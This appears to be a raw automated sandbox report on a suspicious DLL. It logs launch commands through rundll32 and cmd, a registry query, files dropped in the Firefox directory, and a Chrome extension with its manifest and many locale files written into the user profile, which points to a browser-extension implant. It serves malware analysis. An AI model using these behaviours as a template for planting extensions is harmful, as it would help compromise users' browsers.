Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1
Source: rundll32.exe, 00000004.00000003.1663649708.0000000004841000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000004.00000003.1663649708.0000000004841000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: GqjUrFW.dllVirustotal: Detection: 39%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\GqjUrFW.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bakJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpiJump to behavior
Source: GqjUrFW.dllStatic file information: File size 6760960 > 1048576
Source: GqjUrFW.dllStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x5ec000
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoecJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\iconsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\ficon128.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon128.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon16.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon48.pngJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\manifest.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_localesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\amJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\am\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\arJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ar\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\beJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\be\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bgJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bg\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bnJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bn\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\caJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ca\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\csJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\cs\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\daJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\da\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\deJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\de\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\elJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\el\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\enJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_GBJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_GB\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_TOJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_TO\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_USJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_US\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\esJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\etJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\et\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\faJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fa\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\filJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fil\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\frJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\guJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\gu\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\heJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\he\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hi\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\huJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hu\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\idJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\id\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\itJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\it\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\jaJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ja\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\knJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\kn\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\koJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ko\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ltJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lt\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lvJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lv\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mkJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mlJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ml\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mrJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\msJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ms\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nlJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\noJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\no\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\plJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ptJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BRJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BR\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PTJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PT\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\roJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ro\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ruJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ru\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\skJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sk\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\slJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sl\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sqJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sq\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\srJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sr\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\svJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sv\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\swJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sw\messages.jsonJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\taJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ta\messages.jsonJump to behavior
